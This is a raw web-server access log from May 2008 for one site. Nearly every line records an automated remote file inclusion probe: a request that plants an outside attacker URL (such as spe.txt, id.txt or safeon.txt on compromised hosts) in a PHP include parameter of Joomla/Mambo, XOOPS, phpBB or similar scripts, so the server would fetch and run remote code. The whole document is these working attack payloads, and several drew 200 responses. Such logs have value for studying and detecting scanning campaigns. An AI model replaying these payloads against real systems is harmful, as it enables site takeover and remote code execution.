66.7.193.199 - - [24/May/2008:11:56:39 -0700] "GET //modules/Forums/favorites.php?nuke_bb_root_path=http://www.aula-verde.com.ar//media/cmd? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2" "www.dmulk.com"
66.230.197.245 - - [24/May/2008:11:56:40 -0700] "GET /logs/access_080218.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:11:56:54 -0700] "GET /logs/access_080218.log//ipblock.inc.php?path_escape=http://www.scoutspaloke.be//administrator/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:11:56:54 -0700] "GET //ipblock.inc.php?path_escape=http://www.scoutspaloke.be//administrator/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:11:56:55 -0700] "GET /logs//ipblock.inc.php?path_escape=http://www.scoutspaloke.be//administrator/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.230.197.245 - - [24/May/2008:11:56:56 -0700] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://gsis.bogo.net/bbs/tes.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
151.201.139.210 - - [24/May/2008:11:57:36 -0700] "GET /index.php?body=http://www.thiaguinho.net/id.txt? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
72.55.156.181 - - [24/May/2008:11:57:46 -0700] "GET //admin/classes/TplLoad.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:11:57:48 -0700] "GET /logs/access_080215.log//ipblock.inc.php?path_escape=http://www.scoutspaloke.be//administrator/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.64.195.220 - - [24/May/2008:11:58:36 -0700] "GET /logs/access.log/index.php?option=com_custompages&cpage=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.124 - - [24/May/2008:11:58:38 -0700] "GET /logs/access_080215.log/include/db.php?GLOBALS[rootdp]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.124 - - [24/May/2008:11:58:38 -0700] "GET /include/db.php?GLOBALS[rootdp]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.234.200.124 - - [24/May/2008:11:58:38 -0700] "GET /logs/include/db.php?GLOBALS[rootdp]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.64.195.220 - - [24/May/2008:11:58:42 -0700] "GET /logs/index.php?option=com_custompages&cpage=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.64.195.220 - - [24/May/2008:11:58:44 -0700] "GET /index.php?option=com_custompages&cpage=http://www.comova.org.br/www/media/a2id?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.805" "www.dmulk.com"
193.111.11.7 - - [24/May/2008:11:58:50 -0700] "GET /logs/access_080327.log//modules/My_eGallery/index.php?basepath=http://ieras.ru/tmp/mid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
209.216.213.115 - - [24/May/2008:11:58:52 -0700] "GET /logs/access_080218.log/?mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [24/May/2008:11:58:58 -0700] "GET /logs/?mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 200 48843 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [24/May/2008:11:59:04 -0700] "GET /?mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 200 11607 "-" "libwww-perl/5.65" "www.dmulk.com"
212.241.193.243 - - [24/May/2008:11:59:07 -0700] "GET /logs/access_080218.log/?mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.193.243 - - [24/May/2008:11:59:13 -0700] "GET /logs/?mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 200 48843 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.193.243 - - [24/May/2008:11:59:15 -0700] "GET /logs/access_080218.log/?mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.193.243 - - [24/May/2008:11:59:21 -0700] "GET /logs/?mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 200 48843 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.193.243 - - [24/May/2008:11:59:22 -0700] "GET /?mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 200 11607 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.193.243 - - [24/May/2008:11:59:32 -0700] "GET /?mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 200 11607 "-" "libwww-perl/5.79" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:11:59:36 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:11:59:36 -0700] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:11:59:43 -0700] "GET /logs/access_071219.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.244.130.90 - - [24/May/2008:11:59:47 -0700] "GET //phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
83.244.130.90 - - [24/May/2008:11:59:47 -0700] "GET /logs//phpwcms_template/inc_script/frontend_render/navigation/config_HTML_MENU.php?HTML_MENU_DirPath=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
83.102.242.34 - - [24/May/2008:11:59:54 -0700] "GET /logs/access_080320.log//modules/horoscope/footer.php?xoopsConfig[root_path]=http://62.178.28.13/~gpw/modules/Forums/images/ranks/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.102.242.34 - - [24/May/2008:11:59:55 -0700] "GET //modules/horoscope/footer.php?xoopsConfig[root_path]=http://62.178.28.13/~gpw/modules/Forums/images/ranks/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.102.242.34 - - [24/May/2008:11:59:55 -0700] "GET /logs//modules/horoscope/footer.php?xoopsConfig[root_path]=http://62.178.28.13/~gpw/modules/Forums/images/ranks/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.43 - - [24/May/2008:12:00:06 -0700] "GET /logs//modules/horoscope/footer.php?xoopsConfig[root_path]=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.43 - - [24/May/2008:12:00:06 -0700] "GET //modules/horoscope/footer.php?xoopsConfig[root_path]=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.102.242.34 - - [24/May/2008:12:00:19 -0700] "GET /logs//modules/horoscope/footer.php?xoopsConfig[root_path]=http://62.178.28.13/~gpw/modules/Forums/images/ranks/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.102.242.34 - - [24/May/2008:12:00:19 -0700] "GET //modules/horoscope/footer.php?xoopsConfig[root_path]=http://62.178.28.13/~gpw/modules/Forums/images/ranks/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:12:00:20 -0700] "GET /logs/access_080320.log//modules/horoscope/footer.php?xoopsConfig[root_path]=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:12:00:20 -0700] "GET //modules/horoscope/footer.php?xoopsConfig[root_path]=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:12:00:20 -0700] "GET /logs//modules/horoscope/footer.php?xoopsConfig[root_path]=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:12:00:36 -0700] "GET /logs//modules/horoscope/footer.php?xoopsConfig[root_path]=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.84.143.195 - - [24/May/2008:12:00:37 -0700] "GET //modules/horoscope/footer.php?xoopsConfig[root_path]=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.102.242.34 - - [24/May/2008:12:00:40 -0700] "GET /logs/access_080320.log//modules/horoscope/footer.php?xoopsConfig[root_path]=http://62.178.28.13/~gpw/modules/Forums/images/ranks/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.102.242.34 - - [24/May/2008:12:00:41 -0700] "GET //modules/horoscope/footer.php?xoopsConfig[root_path]=http://62.178.28.13/~gpw/modules/Forums/images/ranks/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.43 - - [24/May/2008:12:00:41 -0700] "GET /logs/access_080320.log//modules/horoscope/footer.php?xoopsConfig[root_path]=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.43 - - [24/May/2008:12:00:41 -0700] "GET //modules/horoscope/footer.php?xoopsConfig[root_path]=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.102.242.34 - - [24/May/2008:12:00:41 -0700] "GET /logs//modules/horoscope/footer.php?xoopsConfig[root_path]=http://62.178.28.13/~gpw/modules/Forums/images/ranks/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
193.34.68.43 - - [24/May/2008:12:00:42 -0700] "GET /logs//modules/horoscope/footer.php?xoopsConfig[root_path]=http://www.keynet.com.pl/upload/zestawy/wy.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.163.140.46 - - [24/May/2008:12:01:02 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.163.140.46 - - [24/May/2008:12:01:02 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.segredodoslivros.com/images/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:12:01:09 -0700] "GET /logs//main.php?x=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:12:01:09 -0700] "GET //main.php?x=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)" "www.dmulk.com"
85.119.240.143 - - [24/May/2008:12:01:13 -0700] "GET /logs//modules/Forums/admin/ahttp://www.centenariosafa.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
85.119.240.143 - - [24/May/2008:12:01:13 -0700] "GET //modules/Forums/admin/ahttp://www.centenariosafa.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
83.244.130.90 - - [24/May/2008:12:01:31 -0700] "GET //main.php?x=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
83.244.130.90 - - [24/May/2008:12:01:32 -0700] "GET /logs//main.php?x=http://h1.ripway.com/ulandary/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b1) Gecko/20060710 Firefox/2.0b1" "www.dmulk.com"
85.119.240.143 - - [24/May/2008:12:01:37 -0700] "GET //cohttp://www.centenariosafa.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
85.119.240.143 - - [24/May/2008:12:01:38 -0700] "GET /logs//cohttp://www.centenariosafa.com/test.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8) Gecko/20051107 Firefox/1.5" "www.dmulk.com"
85.119.240.143 - - [24/May/2008:12:02:05 -0700] "GET /logs/access.log//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [24/May/2008:12:02:05 -0700] "GET //component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
85.119.240.143 - - [24/May/2008:12:02:06 -0700] "GET /logs//component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
216.188.60.54 - - [24/May/2008:12:02:29 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://www.radiofeniks.net/mg2/pictures/images? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.113.228.232 - - [24/May/2008:12:02:54 -0700] "GET /logs/access_080211.log//skin/zero_vote/ask_password.php?dir=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.113.228.232 - - [24/May/2008:12:02:55 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.113.228.232 - - [24/May/2008:12:02:55 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
193.136.6.38 - - [24/May/2008:12:03:29 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
193.136.6.38 - - [24/May/2008:12:03:29 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
72.55.156.181 - - [24/May/2008:12:03:33 -0700] "GET /logs//admin/classes/TplLoad.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
72.55.156.181 - - [24/May/2008:12:03:33 -0700] "GET //admin/classes/TplLoad.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
62.141.39.235 - - [24/May/2008:12:03:52 -0700] "GET /logs/access.log//ashnews.php?pathtoashnews=http://www.weber-computerdienst.de/extern/unikat-bensheim/newswriter_sw_1_3/include/ateam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.141.39.235 - - [24/May/2008:12:03:52 -0700] "GET //ashnews.php?pathtoashnews=http://www.weber-computerdienst.de/extern/unikat-bensheim/newswriter_sw_1_3/include/ateam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.141.39.235 - - [24/May/2008:12:03:53 -0700] "GET /logs//ashnews.php?pathtoashnews=http://www.weber-computerdienst.de/extern/unikat-bensheim/newswriter_sw_1_3/include/ateam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:12:03:56 -0700] "GET /logs/amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:12:03:59 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.17.61.114 - - [24/May/2008:12:03:59 -0700] "GET /amember/plugins/payment/linkpoint/linkpoint.inc.php?config[root_dir]=http://www.villa-bizarro.nl/css/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:12:03:59 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
193.136.6.38 - - [24/May/2008:12:04:13 -0700] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
193.136.6.38 - - [24/May/2008:12:04:13 -0700] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://elurbano.com/elurbano/administrator/components/com_jreactions/images/test.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
208.113.228.232 - - [24/May/2008:12:04:15 -0700] "GET /logs/access_080121.log//skin/zero_vote/ask_password.php?dir=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
160.99.12.231 - - [24/May/2008:12:04:38 -0700] "GET /logs/access.log/mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://nozyk.org/rob.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
213.180.89.68 - - [24/May/2008:12:04:49 -0700] "GET //class/class.dashboard_cms.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
217.194.33.88 - - [24/May/2008:12:05:09 -0700] "GET //ipblock.inc.php?path_escape=http://www.scoutspaloke.be//administrator/backups/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
210.48.67.39 - - [24/May/2008:12:05:24 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
210.48.67.39 - - [24/May/2008:12:05:24 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://medisana.co.kr/test?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
151.201.139.210 - - [24/May/2008:12:05:28 -0700] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.thiaguinho.net/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
209.216.213.115 - - [24/May/2008:12:05:42 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.65" "www.dmulk.com"
209.216.213.115 - - [24/May/2008:12:05:42 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
83.102.242.34 - - [24/May/2008:12:05:48 -0700] "GET /logs/access_080218.log//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://62.178.28.13/~gpw/modules/Forums/images/ranks/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.102.242.34 - - [24/May/2008:12:05:48 -0700] "GET //mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://62.178.28.13/~gpw/modules/Forums/images/ranks/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.102.242.34 - - [24/May/2008:12:05:49 -0700] "GET /logs//mambots/content/multithumb/multithumb.php?mosConfig_absolute_path=http://62.178.28.13/~gpw/modules/Forums/images/ranks/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
72.37.217.226 - - [24/May/2008:12:06:21 -0700] "GET /logs//index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.37.217.226 - - [24/May/2008:12:06:23 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.803" "www.dmulk.com"
200.234.200.124 - - [24/May/2008:12:06:36 -0700] "GET /logs/access.log/include/db.php?GLOBALS[rootdp]=http://skill-station.net/help/id.txt?t?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.128.131.80 - - [24/May/2008:12:07:03 -0700] "GET /logs/index1.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.whitegreyblackhat.com/recommended/dotcomincome/mambo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
62.128.131.80 - - [24/May/2008:12:07:03 -0700] "GET /index1.php?option=com_lmo&Itemid=&mosConfig_absolute_path=http://www.whitegreyblackhat.com/recommended/dotcomincome/mambo.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux i686; cs-CZ; rv:1.7.12) Gecko/20050929" "www.dmulk.com"
83.102.242.34 - - [24/May/2008:12:07:03 -0700] "GET /logs/access_080218.log/index2.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://62.178.28.13/~gpw/modules/Forums/images/ranks/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.102.242.34 - - [24/May/2008:12:07:04 -0700] "GET /index2.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://62.178.28.13/~gpw/modules/Forums/images/ranks/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.102.242.34 - - [24/May/2008:12:07:04 -0700] "GET /logs/index2.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://62.178.28.13/~gpw/modules/Forums/images/ranks/safeon.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
212.241.193.243 - - [24/May/2008:12:07:41 -0700] "GET /logs/access_080218.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.193.243 - - [24/May/2008:12:07:48 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.20.46.121 - - [24/May/2008:12:07:51 -0700] "GET /errors.php?error=http://www.lynnlott.com/images/readme.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
213.180.89.68 - - [24/May/2008:12:07:51 -0700] "GET /logs//class/class.dashboard_cms.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
213.180.89.68 - - [24/May/2008:12:07:52 -0700] "GET //class/class.dashboard_cms.php=http://201.6.243.67/UP/xs.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.193.243 - - [24/May/2008:12:07:53 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:12:08:02 -0700] "GET /components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
72.47.201.117 - - [24/May/2008:12:08:02 -0700] "GET /logs/components/com_performs/performs.php?mosConfig_absolute_path=http://h1.ripway.com/inkamarsya/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)" "www.dmulk.com"
62.141.39.235 - - [24/May/2008:12:08:13 -0700] "GET /logs//forum/impex/ImpExData.php?systempath=http://www.weber-computerdienst.de/extern/unikat-bensheim/newswriter_sw_1_3/include/ateam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
62.141.39.235 - - [24/May/2008:12:08:14 -0700] "GET //forum/impex/ImpExData.php?systempath=http://www.weber-computerdienst.de/extern/unikat-bensheim/newswriter_sw_1_3/include/ateam.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
212.241.193.243 - - [24/May/2008:12:08:18 -0700] "GET /logs/access_080218.log/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.193.243 - - [24/May/2008:12:08:24 -0700] "GET /logs/index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
212.241.193.243 - - [24/May/2008:12:08:28 -0700] "GET /index.php?option=com_content&task=§ionid=&id=&mosConfig_absolute_path=http://vivace.biz/spe.txt?? HTTP/1.1" 200 11606 "-" "libwww-perl/5.79" "www.dmulk.com"
66.7.205.39 - - [24/May/2008:12:08:33 -0700] "GET /logs/access_080211.log//skin/zero_vote/ask_password.php?dir=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.205.39 - - [24/May/2008:12:08:33 -0700] "GET //skin/zero_vote/ask_password.php?dir=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
66.7.205.39 - - [24/May/2008:12:08:33 -0700] "GET /logs//skin/zero_vote/ask_password.php?dir=http://iwx.iespana.es/oi.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.240.231.154 - - [24/May/2008:12:08:48 -0700] "GET /logs/access.log//admin/admin_users.php?phpbb_root_path=http://208.56.164.70/coppermine/docs/safe.txt??????? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
